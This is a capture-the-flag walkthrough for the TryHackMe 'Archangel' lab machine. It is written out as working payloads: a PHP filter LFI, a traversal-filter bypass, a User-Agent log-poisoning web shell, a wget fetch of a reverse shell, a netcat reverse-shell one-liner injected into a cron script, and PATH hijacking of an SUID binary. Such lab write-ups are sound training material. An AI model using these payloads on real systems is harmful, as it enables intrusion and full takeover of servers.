Room link :: https://tryhackme.com/room/archangel
Overview
Easy rated boot2root machine at TryHackMe, created by Archangel.This easy machine uses Virtual Domain Name Hosting. Once the correct domain has been found, you need to exploit PHP include() function to get LFI and then to get a reverse shell. After getting reverse shell, you need to exploit cronjob to gain privilege as user. To gain privilege as root you need to exploit PATH variable.
Enumeration
Carry out basic nmap scan with the following command
$ nmap -A <machine-IP>
We can see that two ports are open on the machine. 22 and 80 which are standard SSH and HTTP ports.
Let’s take a look at the webpage. At the top of the website you can find a domain name mafialive.thm
Lets add this domain in our /etc/hosts
file pointing to the IP of the machine.
Visit the webpage with host name. We will get our first flag on the home page.
Further analyzing the website we could find robots.txt
, which restrict access to sensitive data such as admin webpages or assets from web crawlers.
Visiting robots.txt we can find a php file, test.php
Accessing test.php provides the following content.
After clicking the button in the webpage, we can find that it redirects to nmap mrrobot.php
in the direcory /var/www/html/development_testing
This url hints the possibility of Local File Inclusion vulnerability. After trying to access sensitive files like /etc/passwd
and access.log
files by passing the value to view parameter, we could find that the php filter present restricts us from accessing those files. Actual contents of the file can be viewed by parsing the content into base64, as PHP has a inbuilt function to convert normal text to base64. Using the below payload we could read the contents of test.php in base64.
http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
We got the base64 encoded php file. We need to decode it, either we can use online decryptors or we can decode using the following command in terminal.
$ echo "encoded-string" | base64 -d
This gives us the content of test.php and also the second flag.
Checking the php file, we could find that the code is checking two conditions,
Condition 1
if(!containsStr($_GET['view'], '../..')
condition 1 restricts path traversal
Condition 2
if(!containsStr($_GET['view'], '/var/www/html/development_testing'))
condition 2 states that anything we do is restricted to a single location. ie, /var/www/html/development_testing
We can bypass the path traversal protection by using “.././../” instead of “../../” to travel back directories. Reading the access.log file in /var/log/apache2/ shows that the User-Agent is being logged. So we can get an RCE using log poisoning attack.
Now let’s try to access the log ile,
view=/var/www/html/development_testing/.././.././../log/apache2/access.log
We are able to access access.log file, now it’s time to exploit the server using log poisoning attack to gain shell.
Let’s pass a malicious php code snippet in the User-Agent header.
<?php system($_GET['cmd']); ?>
Use burpsuite to intercept the request and pass the malicious php code snippet in the user-agent value.
Now we can pass linux commands in access.log file, let’s verify using the below command
view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=id
We can see that our malicious code is working.
Gaining Foothold
Now let’s upload our php reverse shell using burpsuite. Reverse shell can be found here https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Change IP and PORT where it says //CHANGE THIS, start a python server using $ python3 -m http.server 8000
Upload the shell on target machine using wget and burpsuite. Using
view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget http://<machine-ip>:8000/shell.php
Now let’s start our netcat listener on our local machine on your specified port.
$ nc -nvlp 1337
Trigger the shell by visiting mafialive.thm/shell.php
Upgrade to a stable shell using the following commands
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
Once we are inside the machine we can find the user.txt
under /home/archangel
directory.
Post Exploitation Enumeration
Manually enumerating checking for sudo permissions, SUID binaries and cron jobs, we find an interesting scheduled task which runs every minute as user archangel.
$ cat /etc/crontab
Checking file permissions using
$ ls -la
We can read and write the file. And the file contained a simple bash command echoing “hello world” inside /opt/backupfiles/helloworld.txt
Let’s insert a onliner reverse shell in helloworld.sh
using the following command.
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local-machine-ip> 4444 >/tmp/f" >> helloworld.sh
Privilege Escalation
Start the netcat listener on your local machine and wait for few minutes.
Again upgrade your shell to a stable one with following commands.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
There is a flag that we already got, and also a folder secret
in the home direcory. Changing directory to secret gives us the flag for user2.
Also there is a binary called backup which has an SUID bit set, let’s start a webserver in the remote machine and download this binary to our local machine using wget using the commands,
starting webserver
$ python3 -m http.server 8001
downloading binary using wget
$ wget http://<remote-machine-ip>:8001/backup
Analyze the binary using Ghidra, we get the following in function main
The binary was executing commands to copy files from one directory to another, also the binary was running as root. This mean that if we can replace the systemcp
binary with our own, Then we can have root access.
Let’s create our own binary named cp
and point the $PATH
to our directory.
$ echo "/bin/bash" >> cp
$ chmod +x cp
Set the path variable using
$ export PATH=$PWD:$PATH
And now execute backup
$ ./backup
And we are root now. Find the root flag in the /root
directory.
$ cd /root
$ cat root.txt
Thank You!!
If you have any suggestions, let me know in the comments and follow me on my socials.